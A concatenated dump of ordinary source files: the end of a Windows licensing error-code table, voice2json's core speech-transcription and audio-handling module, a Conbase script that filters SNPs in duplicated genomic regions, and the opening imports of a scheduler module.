'SL_E_VL_KEY_MANAGEMENT_SERVICE_VM_NOT_SUPPORTED' : (0xC004F06B, 'The Software Licensing Service determined that it is running in a virtual machine. The Key Management Service (KMS) is not supported in this mode.'),
'SL_E_VL_INVALID_TIMESTAMP' : (0xC004F06C, 'The Software Licensing Service reported that the product could not be activated. The Key Management Service (KMS) determined that the request timestamp is invalid.'),
'SL_E_PLUGIN_INVALID_MANIFEST' : (0xC004F071, 'The Software Licensing Service reported that the plug-in manifest file is incorrect.'),
'SL_E_APPLICATION_POLICIES_MISSING' : (0xC004F072, 'The Software Licensing Service reported that the license policies for fast query could not be found.'),
'SL_E_APPLICATION_POLICIES_NOT_LOADED' : (0xC004F073, 'The Software Licensing Service reported that the license policies for fast query have not been loaded.'),
'SL_E_VL_BINDING_SERVICE_UNAVAILABLE' : (0xC004F074, 'The Software Licensing Service reported that the product could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.'),
'SL_E_SERVICE_STOPPING' : (0xC004F075, 'The Software Licensing Service reported that the operation cannot be completed because the service is stopping.'),
'SL_E_PLUGIN_NOT_REGISTERED' : (0xC004F076, 'The Software Licensing Service reported that the requested plug-in cannot be found.'),
'SL_E_AUTHN_WRONG_VERSION' : (0xC004F077, 'The Software Licensing Service determined incompatible version of authentication data.'),
'SL_E_AUTHN_MISMATCHED_KEY' : (0xC004F078, 'The Software Licensing Service reported that the key is mismatched.'),
'SL_E_AUTHN_CHALLENGE_NOT_SET' : (0xC004F079, 'The Software Licensing Service reported that the authentication data is not set.'),
'SL_E_AUTHN_CANT_VERIFY' : (0xC004F07A, 'The Software Licensing Service reported that the verification could not be done.'),
'SL_E_SERVICE_RUNNING' : (0xC004F07B, 'The requested operation is unavailable while the Software Licensing Service is running.'),
'SL_E_SLP_INVALID_MARKER_VERSION' : (0xC004F07C, 'The Software Licensing Service determined that the version of the computer BIOS is invalid.'),
'SL_E_INVALID_PRODUCT_KEY_TYPE' : (0xC004F07D, 'The Software Licensing Service reported that the product key cannot be used for this type of activation.'),
'SL_E_CIDIID_MISMATCHED_PKEY' : (0xC004F07E, 'The Installation ID (IID) and the Confirmation ID (CID) do not match the product key.'),
'SL_E_CIDIID_NOT_BOUND' : (0xC004F07F, 'The Installation ID (IID) and the Confirmation ID (CID) are not bound to the current environment.'),
'SL_E_LICENSE_NOT_BOUND' : (0xC004F080, 'The Software Licensing Service reported that the license is not bound to the current environment.'),
'SL_E_VL_AD_AO_NOT_FOUND' : (0xC004F081, 'The Software Licensing Service reported that the Active Directory Activation Object could not be found or was invalid.'),
'SL_E_VL_AD_AO_NAME_TOO_LONG' : (0xC004F082, 'The Software Licensing Service reported that the name specified for the Active Directory Activation Object is too long.'),
'SL_E_VL_AD_SCHEMA_VERSION_NOT_SUPPORTED' : (0xC004F083, 'The Software Licensing Service reported that Active Directory-Based Activation is not supported in the current Active Directory schema.'),
'SL_E_NOT_GENUINE' : (0xC004F200, 'The Software Licensing Service reported that current state is not genuine.'),
'SL_E_EDITION_MISMATCHED' : (0xC004F210, 'The Software Licensing Service reported that the license edition does match the computer edition.'),
'SL_E_TKA_CHALLENGE_EXPIRED' : (0xC004F301, 'The Software Licensing Service reported that the product could not be activated. The token-based activation challenge has expired.'),
'SL_E_TKA_SILENT_ACTIVATION_FAILURE' : (0xC004F302, 'The Software Licensing Service reported that Silent Activation failed. The Software Licensing Service reported that there are no certificates found in the system that could activate the product without user interaction.'),
'SL_E_TKA_INVALID_CERT_CHAIN' : (0xC004F303, 'The Software Licensing Service reported that the certificate chain could not be built or failed validation.'),
'SL_E_TKA_GRANT_NOT_FOUND' : (0xC004F304, 'The Software Licensing Service reported that required license could not be found.'),
'SL_E_TKA_CERT_NOT_FOUND' : (0xC004F305, 'The Software Licensing Service reported that there are no certificates found in the system that could activate the product.'),
'SL_E_TKA_INVALID_SKU_ID' : (0xC004F306, 'The Software Licensing Service reported that this software edition does not support token-based activation.'),
'SL_E_TKA_INVALID_BLOB' : (0xC004F307, 'The Software Licensing Service reported that the product could not be activated. Activation data is invalid.'),
'SL_E_TKA_TAMPERED_CERT_CHAIN' : (0xC004F308, 'The Software Licensing Service reported that the product could not be activated. Activation data is tampered.'),
'SL_E_TKA_CHALLENGE_MISMATCH' : (0xC004F309, 'The Software Licensing Service reported that the product could not be activated. Activation challenge and response do not match.'),
'SL_E_TKA_INVALID_CERTIFICATE' : (0xC004F30A, 'The Software Licensing Service reported that the product could not be activated. The certificate does not match the conditions in the license.'),
'SL_E_TKA_INVALID_SMARTCARD' : (0xC004F30B, 'The Software Licensing Service reported that the inserted smartcard could not be used to activate the product.'),
'SL_E_TKA_FAILED_GRANT_PARSING' : (0xC004F30C, 'The Software Licensing Service reported that the token-based activation license content is invalid.'),
'SL_E_TKA_INVALID_THUMBPRINT' : (0xC004F30D, 'The Software Licensing Service reported that the product could not be activated. The thumbprint is invalid.'),
'SL_E_TKA_THUMBPRINT_CERT_NOT_FOUND' : (0xC004F30E, 'The Software Licensing Service reported that the product could not be activated. The thumbprint does not match any certificate.'),
'SL_E_TKA_CRITERIA_MISMATCH' : (0xC004F30F, 'The Software Licensing Service reported that the product could not be activated. The certificate does not match the criteria specified in the issuance license.'),
'SL_E_TKA_TPID_MISMATCH' : (0xC004F310, 'The Software Licensing Service reported that the product could not be activated. The certificate does not match the trust point identifier (TPID) specified in the issuance license.'),
'SL_E_TKA_SOFT_CERT_DISALLOWED' : (0xC004F311, 'The Software Licensing Service reported that the product could not be activated. A soft token cannot be used for activation.'),
'SL_E_TKA_SOFT_CERT_INVALID' : (0xC004F312, 'The Software Licensing Service reported that the product could not be activated. The certificate cannot be used because its private key is exportable.'),
'SL_E_TKA_CERT_CNG_NOT_AVAILABLE' : (0xC004F313, 'The Software Licensing Service reported that the CNG encryption library could not be loaded. The current certificate may not be available on this version of Windows.'),
'E_RM_UNKNOWN_ERROR' : (0xC004FC03, 'A networking problem has occurred while activating your copy of Windows.'),
'SL_I_TIMEBASED_VALIDITY_PERIOD' : (0x4004FC04, 'The Software Licensing Service reported that the application is running within the timebased validity period.'),
'SL_I_PERPETUAL_OOB_GRACE_PERIOD' : (0x4004FC05, 'The Software Licensing Service reported that the application has a perpetual grace period.'),
'SL_I_TIMEBASED_EXTENDED_GRACE_PERIOD' : (0x4004FC06, 'The Software Licensing Service reported that the application is running within the valid extended grace period.'),
'SL_E_VALIDITY_PERIOD_EXPIRED' : (0xC004FC07, 'The Software Licensing Service reported that the validity period expired.'),
'SL_E_IA_THROTTLE_LIMIT_EXCEEDED' : (0xC004FD00, "You've reached the request limit for automatic virtual machine activation. Try again later."),
'SL_E_IA_INVALID_VIRTUALIZATION_PLATFORM' : (0xC004FD01, "Windows isn't running on a supported Microsoft Hyper-V virtualization platform."),
'SL_E_IA_PARENT_PARTITION_NOT_ACTIVATED' : (0xC004FD02, "Windows isn't activated on the host machine. Please contact your system administrator."),
'SL_E_IA_ID_MISMATCH' : (0xC004FD03, "The host machine can't activate the edition of Windows on the virtual machine."),
'SL_E_IA_MACHINE_NOT_BOUND' : (0xC004FD04, "Windows isn't activated."),
'SL_E_TAMPER_RECOVERY_REQUIRES_ACTIVATION' : (0xC004FE00, 'The Software Licensing Service reported that activation is required to recover from tampering of SL Service trusted store.'),
}
|
core.py | """
Core voice2json command support.
"""
import asyncio
import io
import logging
import os
import queue
import shlex
import ssl
import sys
import threading
import typing
import wave
from pathlib import Path
import pydash
_LOGGER = logging.getLogger("voice2json.core")
# -----------------------------------------------------------------------------
class Voice2JsonCore:
    """Core voice2json command support.

    Wraps a single profile (settings dict plus profile directory) and builds
    the components it describes: speech transcribers, a silence-based voice
    command recorder, audio sources, and WAV format helpers.
    """
    def __init__(
        self,
        profile_file: Path,
        profile: typing.Dict[str, typing.Any],
        certfile: typing.Optional[str] = None,
        keyfile: typing.Optional[str] = None,
    ):
        """Initialize voice2json.

        Args:
            profile_file: path to the profile file; its parent directory is
                used to resolve relative artifact paths (see ppath).
            profile: parsed profile settings, queried with pydash dotted keys.
            certfile: optional SSL certificate file for the HTTP session.
            keyfile: optional private key matching certfile.
        """
        self.profile_file = profile_file
        self.profile_dir = profile_file.parent
        self.profile = profile
        # Shared aiohttp client session (enable SSL)
        self.ssl_context = ssl.SSLContext()
        if certfile:
            _LOGGER.debug("Using SSL certificate %s (keyfile=%s)", certfile, keyfile)
            self.ssl_context.load_cert_chain(certfile, keyfile)
        # Created lazily by the http_session property; closed in stop().
        self._http_session = None
    @property
    def http_session(self):
        """Get or create async HTTP session."""
        # Imported lazily so aiohttp is only required when HTTP is actually used.
        import aiohttp
        if not self._http_session:
            self._http_session = aiohttp.ClientSession()
        return self._http_session
    # -------------------------------------------------------------------------
    # train-profile
    # -------------------------------------------------------------------------
    async def train_profile(self):
        """Generate speech/intent artifacts for a profile."""
        from . import train
        await train.train_profile(self.profile_dir, self.profile)
    # -------------------------------------------------------------------------
    # transcribe-wav
    # -------------------------------------------------------------------------
    def get_transcriber(self, open_transcription=False, debug=False):
        """Create Transcriber based on profile speech system.

        Dispatches on the profile's speech-to-text.acoustic-model-type
        (default "pocketsphinx"); raises ValueError for unknown types.
        """
        from .train import AcousticModelType
        # Load settings
        acoustic_model_type = AcousticModelType(
            pydash.get(
                self.profile, "speech-to-text.acoustic-model-type", "pocketsphinx"
            ).lower()
        )
        if acoustic_model_type == AcousticModelType.POCKETSPHINX:
            # Pocketsphinx
            return self.get_pocketsphinx_transcriber(
                open_transcription=open_transcription, debug=debug
            )
        if acoustic_model_type == AcousticModelType.KALDI:
            # Kaldi
            return self.get_kaldi_transcriber(
                open_transcription=open_transcription, debug=debug
            )
        if acoustic_model_type == AcousticModelType.JULIUS:
            # Julius
            return self.get_julius_transcriber(
                open_transcription=open_transcription, debug=debug
            )
        if acoustic_model_type == AcousticModelType.DEEPSPEECH:
            # DeepSpeech
            return self.get_deepspeech_transcriber(
                open_transcription=open_transcription, debug=debug
            )
        raise ValueError(f"Unsupported acoustic model type: {acoustic_model_type}")
    def get_pocketsphinx_transcriber(self, open_transcription=False, debug=False):
        """Create Transcriber for Pocketsphinx.

        open_transcription=True selects the base (general) dictionary and
        language model instead of the profile's custom, trained ones.
        """
        from rhasspyasr_pocketsphinx import PocketsphinxTranscriber
        # Load settings
        acoustic_model = self.ppath("speech-to-text.acoustic-model", "acoustic_model")
        assert acoustic_model, "Missing acoustic model"
        if open_transcription:
            # Use base dictionary/language model
            dictionary = self.ppath(
                "speech-to-text.base-dictionary", "base_dictionary.txt"
            )
            language_model = self.ppath(
                "speech-to-text.base-language-model", "base_language_model.txt"
            )
        else:
            # Use custom dictionary/language model
            dictionary = self.ppath("speech-to-text.dictionary", "dictionary.txt")
            language_model = self.ppath(
                "speech-to-text.language-model", "language_model.txt"
            )
        assert dictionary and language_model, "Missing dictionary or language model"
        # MLLR adaptation matrix is optional (may be None).
        mllr_matrix = self.ppath(
            "speech-to-text.pocketsphinx.mllr-matrix", "mllr_matrix"
        )
        return PocketsphinxTranscriber(
            acoustic_model,
            dictionary,
            language_model,
            mllr_matrix=mllr_matrix,
            debug=debug,
        )
    def get_kaldi_transcriber(self, open_transcription=False, debug=False):
        """Create Transcriber for Kaldi."""
        from rhasspyasr_kaldi import KaldiCommandLineTranscriber, KaldiModelType
        # Load settings
        model_type = KaldiModelType(
            pydash.get(self.profile, "speech-to-text.kaldi.model-type")
        )
        acoustic_model = self.ppath("speech-to-text.acoustic-model", "acoustic_model")
        assert acoustic_model, "Missing acoustic model"
        if open_transcription:
            # Use base graph
            graph_dir = self.ppath("speech-to-text.kaldi.base-graph-directory") or (
                acoustic_model / "model" / "graph"
            )
        else:
            # Use custom graph
            graph_dir = self.ppath("speech-to-text.kaldi.graph-directory") or (
                acoustic_model / "graph"
            )
        # Use kaldi-decode script
        return KaldiCommandLineTranscriber(model_type, acoustic_model, graph_dir)
    def get_deepspeech_transcriber(self, open_transcription=False, debug=False):
        """Create Transcriber for DeepSpeech."""
        from rhasspyasr_deepspeech import DeepSpeechTranscriber
        # Load settings
        acoustic_model = self.ppath(
            "speech-to-text.acoustic-model", "model/output_graph.pbmm"
        )
        assert acoustic_model, "Missing acoustic model"
        if open_transcription:
            # Use base model
            scorer = self.ppath(
                "speech-to-text.deepspeech.base-scorer", "model/base.scorer"
            )
        else:
            # Use custom model
            scorer = self.ppath("speech-to-text.deepspeech.scorer", "scorer")
        assert scorer, "Missing language model or scorer"
        return DeepSpeechTranscriber(acoustic_model, scorer)
    def get_julius_transcriber(self, open_transcription=False, debug=False):
        """Create Transcriber for Julius."""
        from .julius import JuliusTranscriber
        # Load settings
        acoustic_model = self.ppath("speech-to-text.acoustic-model", "acoustic_model")
        assert acoustic_model, "Missing acoustic model"
        if open_transcription:
            # Use base dictionary/language model
            dictionary = self.ppath(
                "speech-to-text.base-dictionary", "base_dictionary.txt"
            )
            language_model = self.ppath(
                "speech-to-text.base-language-model", "base_language_model.bin"
            )
        else:
            # Use custom dictionary/language model
            dictionary = self.ppath("speech-to-text.dictionary", "dictionary.txt")
            language_model = self.ppath(
                "speech-to-text.language-model", "language_model.txt"
            )
        assert dictionary and language_model, "Missing dictionary or language model"
        return JuliusTranscriber(
            self, acoustic_model, dictionary, language_model, debug=debug
        )
    # -------------------------------------------------------------------------
    # record-command
    # -------------------------------------------------------------------------
    def get_command_recorder(self):
        """Get voice command recorder based on profile settings.

        All tuning values come from the voice-command.* section of the
        profile, with defaults applied for any missing key.
        """
        from rhasspysilence import WebRtcVadRecorder
        # Load settings
        vad_mode = int(pydash.get(self.profile, "voice-command.vad-mode", 3))
        min_seconds = float(
            pydash.get(self.profile, "voice-command.minimum-seconds", 1)
        )
        max_seconds = float(
            pydash.get(self.profile, "voice-command.maximum-seconds", 30)
        )
        speech_seconds = float(
            pydash.get(self.profile, "voice-command.speech-seconds", 0.3)
        )
        silence_seconds = float(
            pydash.get(self.profile, "voice-command.silence-seconds", 0.5)
        )
        before_seconds = float(
            pydash.get(self.profile, "voice-command.before-seconds", 0.5)
        )
        skip_seconds = float(pydash.get(self.profile, "voice-command.skip-seconds", 0))
        chunk_size = int(pydash.get(self.profile, "voice-command.chunk-size", 960))
        sample_rate = int(
            pydash.get(self.profile, "audio.format.sample-rate-hertz", 16000)
        )
        return WebRtcVadRecorder(
            vad_mode=vad_mode,
            sample_rate=sample_rate,
            chunk_size=chunk_size,
            min_seconds=min_seconds,
            max_seconds=max_seconds,
            speech_seconds=speech_seconds,
            silence_seconds=silence_seconds,
            before_seconds=before_seconds,
            skip_seconds=skip_seconds,
        )
    # -------------------------------------------------------------------------
    # Utilities
    # -------------------------------------------------------------------------
    def ppath(
        self, query: str, default: typing.Optional[str] = None
    ) -> typing.Optional[Path]:
        """Return path from profile or path relative to the profile directory.

        Returns None when the profile has no value for query and no default
        was given.
        """
        result = pydash.get(self.profile, query)
        if result is None:
            if default is not None:
                # Fall back to the default, relative to the profile directory.
                result = self.profile_dir / Path(default)
        else:
            result = Path(result)
        return result
    async def convert_wav(self, wav_data: bytes) -> bytes:
        """Convert WAV data to expected audio format.

        Pipes wav_data through the profile's audio.convert-command
        (sox by default) and returns the converted WAV bytes.
        """
        convert_cmd_str = pydash.get(
            self.profile,
            "audio.convert-command",
            "sox -t wav - -r 16000 -e signed-integer -b 16 -c 1 -t wav -",
        )
        convert_cmd = shlex.split(convert_cmd_str)
        _LOGGER.debug(convert_cmd)
        convert_proc = await asyncio.create_subprocess_exec(
            *convert_cmd, stdin=asyncio.subprocess.PIPE, stdout=asyncio.subprocess.PIPE
        )
        # communicate() writes wav_data to stdin and collects all of stdout.
        converted_data, _ = await convert_proc.communicate(input=wav_data)
        return converted_data
    async def maybe_convert_wav(self, wav_data: bytes) -> bytes:
        """Convert WAV data to expected audio format if necessary.

        Compares the WAV header's rate/width/channels against the profile's
        audio.format.* settings and converts only on mismatch.
        """
        expected_rate = int(
            pydash.get(self.profile, "audio.format.sample-rate-hertz", 16000)
        )
        expected_width = (
            int(pydash.get(self.profile, "audio.format.sample-width-bits", 16)) // 8
        )
        expected_channels = int(
            pydash.get(self.profile, "audio.format.channel-count", 1)
        )
        with io.BytesIO(wav_data) as wav_io:
            with wave.open(wav_io, "rb") as wav_file:
                rate, width, channels = (
                    wav_file.getframerate(),
                    wav_file.getsampwidth(),
                    wav_file.getnchannels(),
                )
                if (
                    (rate != expected_rate)
                    or (width != expected_width)
                    or (channels != expected_channels)
                ):
                    _LOGGER.debug(
                        "Got %s Hz, %s byte(s), %s channel(s). Needed %s Hz, %s byte(s), %s channel(s)",
                        rate,
                        width,
                        channels,
                        expected_rate,
                        expected_width,
                        expected_channels,
                    )
                    # Do conversion
                    if rate < expected_rate:
                        # Probably being given 8Khz audio
                        _LOGGER.warning(
                            "Upsampling audio from %s to %s Hz. Expect poor performance!",
                            rate,
                            expected_rate,
                        )
                    return await self.convert_wav(wav_data)
                # Return original data
                return wav_data
    def buffer_to_wav(self, buffer: bytes) -> bytes:
        """Wraps a buffer of raw audio data in a WAV"""
        # Frame parameters come from the profile's audio.format.* settings.
        rate = int(pydash.get(self.profile, "audio.format.sample-rate-hertz", 16000))
        width = int(pydash.get(self.profile, "audio.format.sample-width-bits", 16)) // 8
        channels = int(pydash.get(self.profile, "audio.format.channel-count", 1))
        with io.BytesIO() as wav_buffer:
            wav_file: wave.Wave_write = wave.open(wav_buffer, mode="wb")
            with wav_file:
                wav_file.setframerate(rate)
                wav_file.setsampwidth(width)
                wav_file.setnchannels(channels)
                wav_file.writeframesraw(buffer)
            # Read the finished WAV only after the wave writer has closed.
            return wav_buffer.getvalue()
    async def get_audio_source(self):
        """Start a recording subprocess for expected audio format.

        Returns an object with async read(n)/close() methods wrapping the
        recording process's stdout; close() terminates the process.
        """
        record_cmd_str = pydash.get(
            self.profile,
            "audio.record-command",
            "arecord -q -r 16000 -c 1 -f S16_LE -t raw",
        )
        record_cmd = shlex.split(record_cmd_str)
        _LOGGER.debug(record_cmd)
        record_proc = await asyncio.create_subprocess_exec(
            record_cmd[0], *record_cmd[1:], stdout=asyncio.subprocess.PIPE
        )
        class FakeBinaryIO:
            """Terminate subprocess when closing stream."""
            def __init__(self, proc):
                self.proc = proc
            async def read(self, n):
                """Read n bytes from stream."""
                assert self.proc, "Process not running"
                return await self.proc.stdout.read(n)
            async def close(self):
                """Terminate process."""
                if self.proc:
                    # Clear self.proc first so concurrent read() fails fast.
                    _proc = self.proc
                    self.proc = None
                    _proc.terminate()
                    await _proc.wait()
        return FakeBinaryIO(record_proc)
    # -------------------------------------------------------------------------
    async def stop(self):
        """Stop core."""
        # Close the shared HTTP session, if it was ever created.
        if self._http_session:
            await self._http_session.close()
            self._http_session = None
    # -------------------------------------------------------------------------
    def check_trained(self) -> bool:
        """True if profile is trained.

        Currently only checks that the intent graph artifact exists.
        """
        # Load settings
        intent_graph_path = self.ppath(
            "intent-recognition.intent-graph", "intent.pickle.gz"
        )
        missing = False
        # Written as a loop so more required artifacts can be added later.
        for path in [intent_graph_path]:
            if not (path and path.exists()):
                missing = True
                break
        return not missing
    # -------------------------------------------------------------------------
    async def make_audio_source(self, audio_source: str) -> typing.Any:
        """Create an async audio source from command-line argument.

        None selects the profile's recording command, "-" selects stdin,
        anything else is treated as a file path.
        """
        if audio_source is None:
            # Process source
            _LOGGER.debug("Recording raw 16-bit 16Khz mono audio")
            return await self.get_audio_source()
        if audio_source == "-":
            # Standard input source
            if os.isatty(sys.stdin.fileno()):
                # Only prompt when a human is attached to the terminal.
                print(
                    "Recording raw 16-bit 16Khz mono audio from stdin", file=sys.stderr
                )
            return AsyncStdinReader()
        # File source
        import aiofiles
        _LOGGER.debug("Recording raw 16-bit 16Khz mono audio from %s", audio_source)
        return await aiofiles.open(audio_source, "rb")
# -----------------------------------------------------------------------------
class AsyncStdinReader:
    """Expose sys.stdin.buffer through an async read()/close() interface.

    A daemon worker thread performs the blocking stdin reads; results are
    handed back to the event loop through an asyncio queue.
    """
    def __init__(self, loop: typing.Optional[asyncio.AbstractEventLoop] = None):
        # Loop used to hand results back from the worker thread.
        self.loop = loop or asyncio.get_event_loop()
        # Requested byte counts flow to the worker (None = shut down)...
        self.read_n_queue: "queue.Queue[int]" = queue.Queue()
        # ...and the bytes it reads flow back on this asyncio queue.
        self.read_result_queue: "asyncio.Queue[bytes]" = asyncio.Queue()
        # Started lazily on the first read() call.
        self.read_thread: typing.Optional[threading.Thread] = None
    async def read(self, n: int) -> bytes:
        """Request n bytes from stdin and await the result."""
        if self.read_thread is None:
            # Lazily start the blocking reader thread.
            self.read_thread = threading.Thread(target=self._read_stdin, daemon=True)
            self.read_thread.start()
        self.read_n_queue.put(n)
        return await self.read_result_queue.get()
    async def close(self):
        """Shut down read thread."""
        # None is the shutdown sentinel understood by _read_stdin.
        self.read_n_queue.put(None)
        worker = self.read_thread
        if worker:
            worker.join(timeout=0.5)
            self.read_thread = None
    def _read_stdin(self):
        """Worker loop: service read requests until the None sentinel."""
        while True:
            num_bytes = self.read_n_queue.get()
            if num_bytes is None:
                break
            chunk = sys.stdin.buffer.read(num_bytes)
            # put_nowait must run on the loop's thread; schedule it there.
            self.loop.call_soon_threadsafe(self.read_result_queue.put_nowait, chunk)
|
Misc.py | import csv
import Stats
from Params import misc_params, stats_params, trees, analyze_params
import pysam
import multiprocessing as mp
import argparse
import os
acceptable_bases = {'A','C','G','T'}
def filter_by_trees(sites):
    """Keep only sites whose per-tree HET/HOM genotype counts fall inside
    each tree's configured [MIN, MAX] bounds (from Params.trees)."""
    kept = []
    for site in sites:
        # Tally 'HET'/'HOM' calls per tree over that tree's samples.
        counts = {name: {'HET': 0, 'HOM': 0} for name in trees}
        for name, tree in trees.items():
            for sample in tree['samples']:
                call = site.samples[sample].info[:3]
                if call in counts[name]:
                    counts[name][call] += 1

        def within_bounds(name, tree):
            bounds = tree['params']
            return (bounds['MIN_HET'] <= counts[name]['HET'] <= bounds['MAX_HET']
                    and bounds['MIN_HOM'] <= counts[name]['HOM'] <= bounds['MAX_HOM'])

        if all(within_bounds(name, tree) for name, tree in trees.items()):
            kept.append(site)
    return kept
def trees_stats(sites, output):
    """Filter *sites* by each tree's MIN_HOM threshold, append summary
    statistics to '<output>_trees_stats.txt', and return the filtered list.

    The written line holds the analyze params followed by the fraction of
    sites passing the MIN_HOM filter and the fraction of those that also
    pass the full filter_by_trees() bounds.
    """
    filtered_sites = []
    for site in sites:
        genotype_dict = {tree: {'HET': 0, 'HOM': 0} for tree in trees.keys()}
        for tree_name, tree in trees.items():
            for sample in tree['samples']:
                gt = site.samples[sample].info[:3]
                if gt in genotype_dict[tree_name]:
                    genotype_dict[tree_name][gt] += 1
        # Unlike filter_by_trees, only the MIN_HOM lower bound is enforced here.
        valid_row = all(
            tree['params']['MIN_HOM'] <= genotype_dict[tree_name]['HOM']
            for tree_name, tree in trees.items()
        )
        if valid_row:
            filtered_sites.append(site)
    filtered_sites_2 = filter_by_trees(filtered_sites)
    # NOTE(review): raises ZeroDivisionError when sites or filtered_sites is
    # empty, matching the original behavior; guard upstream if needed.
    # Fix: use a context manager — the original file handle was never closed.
    with open(output + '_trees_stats.txt', 'w') as f:
        f.write(str(analyze_params['dp_tuple_limit']) + '\t' + str(analyze_params['tuples_internal_ratio']) + '\t' + str(analyze_params['tuples_ratio']) + '\t' + str(float(len(filtered_sites))/len(sites)) + '\t' + str(float(len(filtered_sites_2))/len(filtered_sites)) + "\n" )
    return filtered_sites
def check_duplicate_region(sites):
    """Drop sites that sit inside a dense cluster of mutations.

    A site is discarded when some run of mut_nr_limit+1 sites, within a
    window around it on the same chromosome, spans at most mut_dist_limit
    base pairs.
    """
    limit = misc_params["mut_nr_limit"]
    max_span = misc_params["mut_dist_limit"]
    if len(sites) <= limit:
        # Too few sites overall to ever form a dense cluster.
        return sites
    # Bucket sites by integer chromosome id.
    by_chrom = dict()
    for site in sites:
        by_chrom.setdefault(int(site.chrom), []).append(site)
    kept = []
    for _, chrom_sites in sorted(by_chrom.items()):
        if len(chrom_sites) <= limit:
            kept += chrom_sites
            continue
        for index, site in enumerate(chrom_sites):
            lo = max(index - limit, 0)
            hi = min(index + limit + 1, len(chrom_sites))
            window = chrom_sites[lo:hi]
            dense = False
            for start in range(len(window) - limit):
                run = window[start:start + limit + 1]
                positions = [s.pos for s in run]
                if max(positions) - min(positions) <= max_span:
                    dense = True
            if dense:
                print('removed site! position:', site.chrom, site.true_pos)
            else:
                kept.append(site)
    return kept
def snp_in_duplicate_region(snp, bam_file, reference_genome_file):
    """Return True when *snp* appears to lie in a duplicated region.

    Counts high-quality base calls from well-mapped, properly paired reads
    around the SNP, keeps positions whose reference-base fraction is below
    bulk_ref_limit (i.e. variant-rich), and reports a duplicate region when
    snp_nr_limit such positions cluster within snp_dist_limit base pairs.
    """
    # per-position base counts: pos -> {'A': n, 'C': n, 'G': n, 'T': n}
    sites = dict()
    # Window around the SNP, clamped at the chromosome start.
    left = snp['POS']-misc_params["snp_dist_limit"] if snp['POS']-misc_params["snp_dist_limit"] > 0 else 0
    right = snp['POS']+misc_params["snp_dist_limit"]
    for read in bam_file.fetch(snp['CHROM'], left, right):
        # Only well-mapped, properly paired reads contribute evidence.
        if read.mapping_quality >= stats_params["mapping_quality"] and read.is_paired and read.is_proper_pair:
            r = Stats.Read(read.query_name, None, read.query_sequence, read.get_aligned_pairs(),
                           read.reference_start, read.reference_end-1, read.query_qualities, read.mapping_quality, False)
            for pos in r.bases.keys():
                # Count only high-quality base calls inside the window.
                if pos >= left and pos <= right and r.base_quality[pos] > stats_params["base_quality"]:
                    if pos not in sites.keys():
                        sites[pos] = {'A':0, 'C':0, 'G':0, 'T':0}
                    sites[pos][r.bases[pos].upper()] += 1
    reference = Stats.get_references(snp['CHROM'], left, right, reference_genome_file)
    pos_list = list(sites.keys())
    for pos in pos_list:
        ref = reference[pos]
        T = sum(sites[pos].values())  # total coverage at this position
        # Drop positions that look like plain reference (or have an unusable ref base).
        if ref not in acceptable_bases or float(sites[pos][ref])/T >= stats_params["bulk_ref_limit"]:
            sites.pop(pos)
    pos_list = sorted(list(sites.keys()))
    in_duplicate_region = False
    if len(pos_list) > misc_params["snp_nr_limit"]:
        # Slide a window of snp_nr_limit variant positions; a tight cluster
        # (span <= snp_dist_limit) marks a duplicate region.
        for i in range(len(pos_list)-misc_params["snp_nr_limit"] + 1):
            interval = pos_list[i:i+misc_params["snp_nr_limit"]]
            if max(interval) - min(interval) <= misc_params["snp_dist_limit"]:
                in_duplicate_region = True
                break
    return in_duplicate_region
def SNP_duplicate_region(snp_path, bam_path, reference_path, queue):
    """Worker: read SNPs from *snp_path*, write those outside duplicate
    regions to a sibling '..._not_duplicate_region_.tsv' file, then report
    completion by putting *snp_path* on *queue*.
    """
    snps = []
    # Fix: use context managers so the input/output handles are closed
    # (the original reader and writer were both leaked).
    with open(snp_path, 'r') as snp_reader:
        snp_reader.readline()  # skip the header row
        for line in snp_reader:
            CHROM, POS, REF, ALT = line.rstrip('\n').strip().split('\t')
            snps.append({'CHROM': CHROM, 'POS': int(POS), 'REF': REF, 'ALT': ALT})
    bam_file = pysam.AlignmentFile(bam_path, 'rb')
    reference_genome_file = pysam.Fastafile(reference_path)
    with open(snp_path[:-4] + '_not_duplicate_region_.tsv', 'w') as snp_writer:
        for snp in snps:
            if not snp_in_duplicate_region(snp, bam_file, reference_genome_file):
                snp_writer.write(snp['CHROM'] + '\t' + str(snp['POS']) + '\t' + snp['REF'] + '\t' + snp['ALT'] + '\n')
    queue.put(snp_path)
def duplicate_regions(snps_path, bam_path, reference_path, nodes=1, output_name="duplicate_regions"):
    """Split the SNP file into chunks, scan each chunk for duplicate
    regions in parallel, and merge the surviving SNPs into
    ../results/<output_name>.tsv."""
    for needed_dir in ("./.conbase", "../results"):
        if not os.path.exists(needed_dir):
            os.makedirs(needed_dir)
    snps_chunks_path, _ = Stats.snps_to_chunks(snps_path, int(nodes), output_name)
    queue = mp.Queue()
    workers = []
    for snps_chunk_path in snps_chunks_path:
        worker = mp.Process(target=SNP_duplicate_region, args=(snps_chunk_path, bam_path, reference_path, queue))
        workers.append(worker)
        worker.start()
    for worker in workers:
        worker.join()
    # Drain the completion tokens the workers posted.
    while not queue.empty():
        queue.get()
    print('all done')
    # Write the merged result header, then append each chunk's output.
    result_file = open( '../results/' + output_name + '.tsv', 'w')
    result_file.write('CHROM' + '\t' + 'POS' + '\t' + 'REF' + '\t' + 'ALT' + '\n')
    result_file.close()
    for snps_chunk_path in snps_chunks_path:
        chunk_result = snps_chunk_path[:-4] + '_not_duplicate_region_.tsv'
        os.system('cat '+chunk_result+' >> ../results/' + output_name + '.tsv')
    # Clean up intermediate chunk files.
    os.system("rm ./.conbase/duplicate_region_*")
    os.system("rm ./.conbase/" + output_name + "_snp_chunk_*")
if __name__ == '__main__':
    # CLI entry point: --duplicate_regions takes all five positional values.
    parser = argparse.ArgumentParser(description='Conbase preprocessing-tool for removing duplicate regions')
    parser.add_argument('--duplicate_regions', nargs=5, metavar=("<snp path>", "<bam path>", "<reference path>", "<number of nodes>", "<output name>"))
    cli_args = parser.parse_args()
    if cli_args.duplicate_regions is not None:
        duplicate_regions(*cli_args.duplicate_regions)
# bulk_path = "/media/box2/Experiments/Joanna/Snake_analys/j_frisen_1602/Fibs/Tree2/FibBulk/FibBulk.reAligned.bwa.bam"
# reference_path = "/media/box2/reference_assemblies/bundle/2.8/b37/from_pall/human_g1k_v37.fasta"
# chrom = '1'
# chrom_sites = chrom_alt_sites(chrom, bulk_path, reference_path)
# chrom_duplicate_region(chrom,chrom_sites.keys())
|
Scheduler.py | import asyncio
import datetime
import os
import sys
import threading
import time
# import _thread as thread
from functools import wraps
